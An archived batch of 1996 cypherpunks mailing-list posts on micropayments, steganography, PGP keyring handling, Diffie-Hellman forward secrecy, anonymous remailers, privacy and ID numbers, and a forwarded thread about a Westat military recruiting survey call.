Date: Thu, 19 Sep 1996 12:16:39 -0400 (EDT)
Mime-Version: 1.0
To: "mpay list (MIT)" <micropay@ai.mit.edu>
From: felixk@panix.com (Felix Kramer)
Subject: Clickshare launches Internet's first multi-site micropayments service
Sender: owner-micropay@ai.mit.edu
Precedence: bulk
Reply-To: micropay@ai.mit.edu

Here are the first paragraphs of a press release, the rest of which can be
found at:
http://www.clickshare.com/pubpack/releases.html

Clickshare launches Internet's first multi-site micropayments service
"Internet Information Utility" delivers commerce a la carte

        WILLIAMSTOWN, Mass., Sept. 16  --  Clickshare Corporation's
pioneering multi-site, single-ID, Internet micropayment system went live on
Friday as users began clicking on -- and paying for -- information online.
Purchases from Friday to Sunday by over a dozen first registrants totaled
$62.60.

        "We're the web's first working multi-site distributed
user-management and micropayment service," said Bill Densmore, Clickshare's
chairman. "Now publishers can charge for valuable information on the
Internet, rather than giving it away."

       "Now that 'The Internet's Information Utility' (sm)  is up and
running," said Felix Kramer, Clickshare marketing director, "we'll finally
see whether people will buy information by the click."

-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
 Felix Kramer, Marketing Director                   CLICKSHARE CORP.
 felix@clickshare.com                          Direct: 212/866-4864
 www.clickshare.com                         Corporate: 413/458-8001
 www.nlightning.com (personal)                    fax: 212/866-5527
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 20 Sep 1996 06:57:08 +0800
To: cypherpunks@toad.com
Subject: Re: The periodic caveat about Timmy May
In-Reply-To: <199609190517.HAA00851@basement.replay.com>
Message-ID: <199609191920.NAA00823@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <199609190517.HAA00851@basement.replay.com>, on 09/19/96
   at 07:17 AM, nobody@flame.alias.net (Anonymous) said:


Timmy May habitually digs into his cesspool of a mind for his

mailing list fertilizer.

        this is humour.   it tickles the imagination, and the reference
    to tim is lost!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 20 Sep 1996 09:40:50 +0800
To: Mullen Patrick <Mullen.Patrick@mail.ndhm.gtegsc.com>
Subject: re: Stego inside encryption
In-Reply-To: <n1368993974.6219@mail.ndhm.gtegsc.com>
Message-ID: <Pine.SUN.3.91.960919192653.4964B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Sep 1996, Mullen Patrick wrote:

> To take this one step further, has anyone tried to ever use this method as
> an encryption method?  You could hide data in a stream of random bits, using
> position as the encryption method.  Obviously, the data would not be stored
> in packets; rather as single bits strewn throughout the stream.  Even ASCII
> characters could be hidden in such a system very well, as the possibility of
> choosing the correct 8 bits (extended char set) from the data stream when
> any combination has equal potential of being the correct sequence would be
> extremely difficult.  Error checking/correcting code could even be used.
> 
> Using this system, the placement algorithm would be the focus of attack.  If
> an algorithm which has a sufficiently random placement was used, extracting
> the correct bits would be difficult.  Another way to increase the security
> would be to hide the correct message inside a bitstream created by using
> the same method on other similar messages.  (Hiding a real message inside
> bogus messages.  Hmm...  Which one's real?)

I've written something similar to this idea a few years ago. :)  You 
might want to check it out.  Do a net search for WNS210.ZIP at your 
nearest good crypto ftp site.  You might want to try ftp.wimsey.ca.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frogfarm@yakko.cs.wmich.edu (Damaged Justice)
Date: Fri, 20 Sep 1996 10:51:04 +0800
To: cypherpunks@toad.com
Subject: (fwd) Strange telephone call
Message-ID: <199609192333.TAA25736@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: vandy@avana.net (Vandy Terre)
Newsgroups: alt.folklore.urban,alt.pagan,alt.revenge,alt.snowmobiles,ga.forsale,ga.general,misc.consumers.frugal-living,misc.rural
Subject: Strange telephone call
Date: Wed, 18 Sep 1996 14:27:05 GMT
Organization: Tanglewood Farm
Lines: 59
Message-ID: <323ffe3d.188173@news.avana.net>

This message is being cross posted to several groups that I read in an
effort to find an answer to my questions.  Please email replies, not
all posts make it to my server.  If you must answer on the net, please
trim headers.

Okay, this is the story.  I just received a strange telephone call.
My caller ID system shows only 'OUT_OF_AREA-----000-----'.  The female
voice claimed to be taking a survey for the Department of Defense and
that she was acting as a representative of my government.  She did not
say US Government or State Government, just 'your government'.  

When I said that there was no way for me to verify she was what she
claimed, she gave me a business name, supervisor's name and an 800
telephone number.  She claimed this survey had to do with a Department
of Defense program named 'YATS' and told me that if my household did
not qualify, then our telephone number would be removed from the
calling list.  She then ask the same question three different ways.
The question was 'Is there anyone in your household between the ages
of 16 and 24?'.  When I said no for the third time, she said we did
not qualify and hung up.

So here are my questions.

Was this a legitimate call?  The government should already know
exactly how many people are in my household.  It is on my tax forms
every year and many other places.

Why would any government office or representative of a government
office be making cold calls to unknown telephone numbers for any kind
of survey?

Who or what is 'Westat'?  This is the name of the company this woman
supposedly represented.

The telephone number given to me is 1-800-638-8778.  The same woman
answered it as called me.  Seems like a company doing a survey for the
government would have more than one employee.  Her supervisor's name
is Chris Martin.  Is she Chris Martin?  In a single person office, I
guess you would be your own supervisor.  The woman never gave her
personal name.

This survey was supposed to be for the Department of Defense for a
program named 'YATS'.  What is YATS?

My biggest question is, Is this a new face on an old scam?  Instead of
posing as the local fire department looking for donations, are the
scam-artist now posing as the government?  What a way to case a home
in preparation for theft or running yet another scam of questionable
legality.  Yes, I am a very suspicious person.  I have seen too many
scams being run.

Thank you for taking the time to read this.  Please answer by email.
Please trim headers if answering on the net.  Thank you.


Any significantly advanced scam          vandy@avana.net 
is indistinguishable 
from religion.                           Georgia, USA


-- 
frogfarm@yakko.cs.wmich.edu (Damaged Justice) is officially declared Unmutual.
  "Would I had phrases that are not known, utterances that are strange, in
     new language that has not been used, free from repetition, not an
      utterance which has grown stale, which men of old have spoken."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frogfarm@yakko.cs.wmich.edu (Damaged Justice)
Date: Fri, 20 Sep 1996 10:52:10 +0800
To: cypherpunks@toad.com
Subject: (fwd) Re: Strange telephone call
Message-ID: <199609192334.TAA25744@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: MS <selahi@fox.nstn.ca>
Newsgroups: misc.consumers.frugal-living
Subject: Re: Strange telephone call
Date: Thu, 19 Sep 1996 18:19:12 -0400
Organization: NSTN
Lines: 159
Message-ID: <3241C6DF.17CE@fox.nstn.ca>
X-No-Archive: Yes

I did an Altavista search on Westat with these results:

1.) Westat's Internet site
2.) A document from the DEFENCE LOGISTICS AGENCY on YATS

I guess that phone call wasn't a scam after all...

BTW, whenever in doubt, just run your Internet browser and use the
search engines. You'll be amazed at how much info you can get by just
typing in a word or two.

MS


1.) Quoted from Westat's home page (http://www.westat.com/)

Westat

An Employee-Owned Research Corporation

Welcome to Westat 

Westat is an employee-owned corporation
headquartered in the greater Washington, DC,
metropolitan area. We conduct surveys and provide
statistical research and related services to the agencies
of the U.S. Government and a broad range of institutional
and business clients. Our diverse staff of 800 enables us
to assemble project teams to meet the challenges of
complex research projects. With a more than 30-year
history of technical and managerial excellence, Westat
has emerged as one of the foremost statistical research
and evaluation organizations in the United States. 

Additional Information about Westat: 

    Research Capabilities 
    Program Areas 
    Employee Ownership 
    How to Contact Westat 
    Opportunities for Systems Professionals 
    Statistical Software (WesVarPC) 


Last Modified: May 14, 1996 

Site comments or problems: Webmaster@Westat.com 

Please note: Pages at this site have been designed for viewing with
Netscape 1.1X Navigator using monitors displaying at least 256
colors. Use of a different HTML viewer or a display with less than 256
colors may result in the loss of page layout information and/or poor
quality images. 


2.) Document on 'YATS' (the following lines as they appeared on
Altavista's search)

No Title
    May 1, 1996. DEFENSE LOGISTICS AGENCY. Environmental Research
Institute of Michigan, Ann Arbor, Michigan, is being awarded an
estimated $44,425,774...  http://www.fedmarket.com/blue5-1.html - size
8K - 29 May 96

***********
Westat, Incorporated, Rockville, Maryland, is being awarded a $1,630,647
increment as part
of a $15,155,183 firm fixed price contract for a Communications
Enlistment Decisions - Youth
Attitude Tracking Study (YATS). This effort requires the contractor to
administer half-hour
computer assisted telephone interviews (CATIs) in an annual survey of
10,000 16-24 year-old
men and women that evaluates their attitudes toward the military. The
purpose of this survey
is to provide the Armed Services with market data that enables them to
more accurately target
advertising and recruiting activities to appeal to potential recruit
populations. The project
includes design and selection of the sample, modification of the survey
instrument,
questionnaire administration, compilation and weighting of the data,
production of preliminary
and public use data tapes and preparation of documentation and
analytical reports. Work will
be performed in Rockville, Maryland, and is expected to be completed by
July 31, 2001.
Contract funds will not expire at the end of the current fiscal year.
There were 45 bids solicited
on January 26, 1996, and two bids received. The contracting activity is
the Defense Supply
Service-Washington, Washington, D.C. (DASW01-96-C-0041).

*************


-- 
http://yakko.cs.wmich.edu/~frogfarm  ...for the best in unapproved information
Tell your friends 'n neighbors you read this on the evil pornographic Internet
"Where one burns books, one will also burn people eventually." -Heinrich Heine
People and books aren't for burning. No more Alexandrias, Auschwitzs or Wacos.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 20 Sep 1996 10:48:23 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <43kcuD64w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.95.960919201036.23640C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


See

http://www.law.miami.edu/~froomkin/articles/trustedno.htm#ENDBACK31

for another use of the term...

**Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"**

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 20 Sep 1996 13:52:35 +0800
To: Mullen Patrick <Mullen.Patrick@mail.ndhm.gtegsc.com>
Subject: Re: Stego inside encryption
In-Reply-To: <n1368993974.6219@mail.ndhm.gtegsc.com>
Message-ID: <32421412.2C7C@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mullen Patrick wrote:
> To take this one step further, has anyone tried to ever use this
> method as an encryption method?  You could hide data in a stream of
> random bits, using position as the encryption method.  Obviously, the 
> data would not be stored in packets; rather as single bits strewn
> throughout the stream.  Even ASCII characters could be hidden in such 
> a system very well, as the possibility of
> choosing the correct 8 bits (extended char set) from the data stream
> when any combination has equal potential of being the correct sequence 
> would be extremely difficult.  Error checking/correcting code could 
> even be used.
> Using this system, the placement algorithm would be the focus of
> attack.  If an algorithm which has a sufficiently random placement was 
> used, extracting the correct bits would be difficult.  Another way to 
> increase the security would be to hide the correct message inside a
> bitstream created by using the same method on other similar messages. 
> (Hiding a real message inside bogus messages. Hmm...Which one's real?)..... some text deleted here....

This sounds like exactly what I've been saying. You could paste the 
message inside or adjacent to the non-text data (and you could bit-pad 
the text before doing so), then move all the bits around, etc.

I'm not sure what was meant by "even ASCII characters could be 
hidden...", since just before you encrypt, everything's ASCII in some 
sense or another.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 20 Sep 1996 14:25:02 +0800
To: csteel@teir.com (Chris Steel)
Subject: Re: Private key server
Message-ID: <199609200400.VAA04898@dfw-ix1.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 AM 9/18/96 -0400, csteel@teir.com (Chris Steel)
wrote about the problem of getting his public and private keys to
various machines around his company, and would like some sort of
secret-key-ring server to make it easier to download them
(and presumably to avoid leaving them on the disks of shared machines
for longer than necessary.)

This is, of course, semi-dangerous, for a couple of reasons
1) Limiting access to your secret keyring file reduces the probability 
of a brute-force cracker attack against your keyring - 
if your password is "foo", then anybody who has your keyring can
probably find that out quickly if they hack a pgp-keyring-cracker.
2) Your keyring has, in cleartext, the identities of the different
keys on it.  If you only use one id, and it's well-known, that doesn't
expose you particularly, but if you're using multiple nyms,
anyone who has your file can connect them by just looking at the
printable parts of the file.

However, assuming you've decided to do it anyway :-), what are your options?
You could use a networked file system such as NFS or Netware or the
Evil Microsoft NETBIOS-based filesystems, and take advantage of their
protections.  Since they don't ship encrypted data, any eavesdropper can
find them anyway, but they won't be able to just grab the file off the net.
You'd be better off, however, using a secure web server, like Apache-SSL,
and only providing https: access to the page plus passwords plus 
address-based restrictions to try to make it accessible only to you
and not eavesdroppable.  Also, you can encrypt the copy of the secret
keyring you distribute using a secret key you can remember.

But don't do it :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Fri, 20 Sep 1996 11:07:28 +0800
To: Julian Assange <proff@suburbia.net>
Subject: Re: Morality, Responsibility, Technology.
In-Reply-To: <199609191327.XAA00418@suburbia.net>
Message-ID: <Pine.3.89.9609191706.A8214-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain




>> The term "defect" is therefore entirely out of line.  We have no business
>> placing judgements from our own limited material value sets onto 
>> something which has the definite potential of affecting all future 
>> generations of Humanity.  It's none of our business.
> 
>The problem however, is that artificial selection maybe the only way to
>select beneficial attributes at all. What is presently being selected
>for in western societies is all the factors that lead to a lack of
>practice or belief in birth control. I'll let the reader think for a
>moment on just what those are. Perhaps we can also somehow test for and
>abolish the "Catholic" gene?

You offer the humorous example of Catholicism.  But this is really a 
deceptively clear example of exactly what I was saying: that we aren't even 
close to having any kind of objective faculties which would be required 
to competently make these kinds of decisions.  Catholicism: is it Nature 
or is it Nurture?  This example would effectively equivalent to just one 
ideology gaining "leverage" over another, and using the technology of 
genetics to gain this leverage.  I'll finish this up below.

I don't want to miss your real counterpoint behind the example.  What I hear 
you really saying is that you can open your eyes, and look around at the 
processes of natural selection in action, and you can see all kinds of 
social forces at work, many of which would appear, given our value set, to 
be functioning to the disadvantage of the species.  But again, this 
proves even more brutally how deeply our lack of objectivity runs when we 
try to evaluate such matters.

We tend to value traits such as industriousness, and yet we see some social 
welfare programs which effectively reward the absence of this quality.  
This example, as well as your own example, are issues which we can't 
even reach a consensus on socially.  And since *we* can't even deal with 
such things socially, how could we ever presume to claim the moral 
competence to address them genetically?

For example, our western society is less than 9,000 years old.  As 
participants we assume our western society is "good."  But a traditional 
Australian Aborigine, coming from a 35,000 to 60,000 year old society, 
might have a completely different perspective.  He might view our 
European lifestyle as one very big mistake, and a recent one at that.  
Maybe, just maybe, we have culturally taken a very large step away 
from what our inherent natures really are.  If this were true you might 
expect to see a larger amount of latent grey matter evolved into all of 
our skulls than any of us really use.  But then, this *is* the case.

So as we are, nobody really knows what the effect of widespread crypto 
will be, any more than we could have predicted the impact of cars or 
transistors or nuclear fission.  The future is literally in your hands.


Douglas B. Renner
dougr@usa.globelle.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Fri, 20 Sep 1996 12:57:20 +0800
To: deviant@pooh-corner.com
Subject: Re: All Bets Off
Message-ID: <199609200230.WAA05165@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


I don't doubt this, honestly.  After all, novels alone don't earn the kind of
guided tours, information, and assistance he's received on many counts.  It
had the feel of military connections, but I wasn't about to doubt it, I've
allways this truely was the Land Of Opertunity.

In any event, he deserves such treatment.  He's an excellent author, and does
justice to the people he portrays, despite the disclaimer that none of the
characters are made to represent anyone living or dead.

Daniel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kaye Caldwell <kaye@ix.netcom.com> (by way of frantz@netcom.com (BillFrantz))
Date: Fri, 20 Sep 1996 15:47:30 +0800
To: cypherpunks@toad.com
Subject: ** 9/24 Ca. Dig. Sig. Working Group Meeting **
Message-ID: <199609200533.WAA28740@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Reposted from spki.  -  Bill

--------
Apologies for duplicates - some of you I'm sure are on multiple notice lists
for this.

California Digital Signature Regulations Working Group
sponsored by the Software Industry Coalition and CommerceNet

THIS MEETING IS OPEN TO ANYONE WHO WISHES TO ATTEND
However, please let me know if you will be attending via e-mail to:
kaye@ix.netcom.com

WHEN: Tuesday September 24, 1-4 PM
WHERE: Sun Microsystems, 901 San Antonio Rd, (Building PAL-1)
              (corner of  S. A. & Charleston, just off 101), Palo Alto
              Cancun Conference Room, 2nd Floor 

AGENDA 

I. Report on status of Secretary of State's Task Force 
     - request for demos of technology in Sacramento
II. Review of draft of our principle 1, suggestions for additional principles
III. Review of current draft of outline of regulations
IV. Review of draft Digital Signature Acceptance Procedures background paper
V. Draft language for additional technologies

For more information, e-mail Kaye Caldwell at kaye@ix.netcom.com or call
408-479-8743.

Kaye Caldwell
Software Industry Coalition Policy Director
CommerceNet Adovocacy and Public Policy Committee Chair
-------------------------------











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 20 Sep 1996 17:50:03 +0800
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: (fwd) Strange telephone call
In-Reply-To: <199609192333.TAA25736@yakko.cs.wmich.edu>
Message-ID: <32423366.3D24@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Damaged Justice wrote:
> Okay, this is the story.  I just received a strange telephone call.
> My caller ID system shows only 'OUT_OF_AREA-----000-----'.  The female
> voice claimed to be taking a survey for the Department of Defense and
> that she was acting as a representative of my government.  She did not
> say US Government or State Government, just 'your government'.
> When I said that there was no way for me to verify she was what she
> claimed, she gave me a business name, supervisor's name and an 800
> telephone number.  She claimed this survey had to do with a Department
> of Defense program named 'YATS' and told me that if my household did
> not qualify, then our telephone number would be removed from the
> calling list.  She then ask the same question three different ways.
> The question was 'Is there anyone in your household between the ages
> of 16 and 24?'.  When I said no for the third time, she said we did
> not qualify and hung up.
> So here are my questions.
> Was this a legitimate call?  The government should already know
> exactly how many people are in my household.  It is on my tax forms
> every year and many other places.
> Why would any government office or representative of a government
> office be making cold calls to unknown telephone numbers for any kind
> of survey?
> Who or what is 'Westat'?  This is the name of the company this woman
> supposedly represented.
> The telephone number given to me is 1-800-638-8778.  The same woman
> answered it as called me.  Seems like a company doing a survey for the
> government would have more than one employee.  Her supervisor's name
> is Chris Martin.  Is she Chris Martin?  In a single person office, I
> guess you would be your own supervisor.  The woman never gave her
> personal name.
> This survey was supposed to be for the Department of Defense for a
> program named 'YATS'.  What is YATS?
> My biggest question is, Is this a new face on an old scam?  Instead of
> posing as the local fire department looking for donations, are the
> scam-artist now posing as the government?  What a way to case a home
> in preparation for theft or running yet another scam of questionable
> legality.  Yes, I am a very suspicious person.  I have seen too many
> scams being run.

My GTE WATS line for internet is 800-638-xxxx, so maybe they're related.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 20 Sep 1996 15:19:27 +0800
To: cypherpunks@toad.com
Subject: Re: The periodic caveat about Timmy May
In-Reply-To: <199609191920.NAA00823@InfoWest.COM>
Message-ID: <NNaJuD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


attila <attila@primenet.com> writes:

> In <199609190517.HAA00851@basement.replay.com>, on 09/19/96
>    at 07:17 AM, nobody@flame.alias.net (Anonymous) said:
>
> = .Timmy May habitually digs into his cesspool of a mind for his
> = .mailing list fertilizer.
>
>         this is humour.   it tickles the imagination, and the reference
>     to tim is lost!

Can we get all this non-crypto-relevant shit off of this mailing list please?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 20 Sep 1996 07:57:22 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DL in exchange for fingerprint
In-Reply-To: <ae66bb9816021004790c@[207.167.93.63]>
Message-ID: <3241B75D.41C67EA6@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> (Yes, I disliked being thumb-printed, but I could see no viable
> alternative. I'm sure Duncan has some scheme to declare himself a Botswanan
> exchange student, but I decided being thumb-printed was the lesser hassle.)

Sure, it's always less hassle doing what they want.  Privacy doesn't
come for free.  It's easier to let the police search you in the street
than it is to make them arrest you so that you can make a formal
complaint.


> By the way, the next rev of the California driver's license will reportedly
> have one's *Social Security Number* printed on the card! So much for the
> statement clearly printed on my card:
> 
> "For social security and tax purposes -- not for identification."

So?  My passport reads "let the bearer travel without let or hindrance"
- yet I still get enormous grief every time I enter the country that
issued it.


> Paraphrasing that famous quote, just which part of "not for identification"
> don't they understand?

Hmm - who are you paraphrasing here? (Just curious).


> (Indeed, I am asked for my SSN in many places. A few times I've refused to
> give it. Once the clerk just said, "Fine, I have it here on my computer
> anyway." Refusing to give it is probably no longer meaningful, due to
> massively cross-linked data bases.)
> 
> Again, we desperately need an infrastructure of "credentials without identity."

Or widespread disinformation - don't stand up for your "right" not to
disclose your SSN - simply give them one with errors in - that way their
whole database starts to lose value.


Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Fri, 20 Sep 1996 01:25:51 +0800
To: dougr@skypoint-gw.globelle.com (Douglas B. Renner)
Subject: Re: Morality, Responsibility, Technology.
In-Reply-To: <Pine.3.89.9609190259.A6425-0100000@skypoint-gw.globelle.com>
Message-ID: <199609191327.XAA00418@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> The term "defect" is therefore entirely out of line.  We have no business
> placing judgements from our own limited material value sets onto 
> something which has the definite potential of affecting all future 
> generations of Humanity.  It's none of our business.

The problem however, is that artificial selection maybe the only way to
select beneficial attributes at all. What is presently being selected
for in western societies is all the factors that lead to a lack of
practice or belief in birth control. I'll let the reader think for a
moment on just what those are. Perhaps we can also somehow test for and
abolish the "Catholic" gene?

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HipCrime <robert@precipice.v-site.net>
Date: Fri, 20 Sep 1996 16:57:15 +0800
To: cypherpunks@toad.com
Subject: Re: did you go to school?
In-Reply-To: <199609200537.AAA00264@smoke.suba.com>
Message-ID: <324239A6.163F@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain


message returned, then deleted (UNREAD)

-- HTTP://www.HIPCRIME.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 20 Sep 1996 17:27:50 +0800
To: Bodo_Moeller@public.uni-hamburg.de (Bodo Moeller)
Subject: Re: stealthy key exchange
Message-ID: <199609200649.XAA13400@dfw-ix1.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 AM 9/19/96 DST, Bodo_Moeller@public.uni-hamburg.de (Bodo Moeller)
wrote:
>If both have public keys, what is the point of using Diffie-Hellman?
>The two channels (Alice -> Bob and Bob -> Alice) are independent, so
>they can use different session keys.  Alice creates a random key K_A
>and sends it to Bob (encrypted with Bob's public key).  Alice uses K_A

Diffie-Hellman gives you forward security - if an eavesdropper copies
your message and later steals your secret keys, he can't decrypt it,
because there's no encrypted session key to recover.  To prevent 
man-in-the-middle attacks, sign your half-keys with your public key.

There are some problems with this method - it requires several 
exchanges, so it's awkward to use for email (though you can do it.)
Also, it does expose the signed keyparts, which reveals the public
key used for signing, though you can play games to prevent this
(e.g. negotiate the key, and send the signed keyparts encrypted
with the public key, though if there _is_ a man-in-the-middle,
the MITM can see this, and your connection will fail.)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 20 Sep 1996 14:24:07 +0800
To: Andrew Fabbro <afabbro@umich.edu>
Subject: Re: LEOs running anon servers?
In-Reply-To: <Pine.SUN.3.95.960910115139.6526I-100000@stimpy.us.itd.umich.edu>
Message-ID: <Pine.SUN.3.95.960920001247.23640W-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


This claim was made at a symposium held at Harvard by a sometime lecturer
at the National Defense college.  He later denied it.  Since lots of other
things he said in the same lecture were plainly false (more likely his
ignorance than a clever attempt to spread FUD), I wouldn't lose sleep over
it.

Anyway, who cares -- you just use encryption and chaining and all is well.

See http://www.law.miami.edu/~froomkin/articles/oceanno.htm#xtocid583110
for more info.


On Tue, 10 Sep 1996, Andrew Fabbro wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Mon, 9 Sep 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > There
> > are a number of anonymous remailers out in cyberspace, but it has been
> > stated by a knowledgeable source that a number of them are being operated
> > by law enforcement agencies (presumably to troll for criminal activity). A
> 
> 
> Can someone verify/discredit/comment on this statement?  Who is the
> knowledgeable source?
> 
> 
> 
>  
> Andrew Fabbro  [afabbro@umich.edu]  http://www-personal.umich.edu/~afabbro/
> PGP mail preferred; finger afabbro@us.itd.umich.edu for key    
> "A good marketing organization listens to its customers...WE HEAR YOU!"
> 		- the National Security Agency
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: PGP Signed with PineSign 2.0
> 
> iQCVAwUBMjWOx7oWkgjb6N6dAQEK4QP9ETvg03QMpYw81FmXNl0vxbkYLk9wph74
> /291PduW3+BkN17iKBBns6v//HrnZJIttMqG+7wLzrX+zt1OpspGJLjJm03P/m68
> CQ8L2K3stOyYvSB/S63M449eC+QX9iNEFpLD/QNOv7JM4ZVgQvEvUH6STaxF+Ez4
> ClypqKualSA=
> =L3rM
> -----END PGP SIGNATURE-----
> 

**Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"**

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 20 Sep 1996 14:47:20 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Fed appellate judge remarks re anonymity
In-Reply-To: <ae5e145d05021004394a@[207.167.93.63]>
Message-ID: <Pine.SUN.3.95.960920003341.23640d-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


For a quick survey of anti-mask laws in the U.S. and their mixed
reception in the courts see

http://www.law.miami.edu/~froomkin/articles/clippern.htm#ToC54

The law is in flux here.


On Thu, 12 Sep 1996, Timothy C. May wrote:

> At 1:47 AM 9/13/96, Jim Choate wrote:
> >Forwarded message:
> >
> >> Date: Thu, 12 Sep 1996 17:40:19 -0700
> >> From: Greg Broiles <gbroiles@netbox.com>
> >>
> >> The article quotes Kozinski as saying "I have a severe problem with
> >> anonymous E-mailers . . . You don't have a right to walk up to somebody's
> >> door and knock with a bag over your head." The article says Kozinski likened
> >> anonymous E-mail to menacing someone.
> >
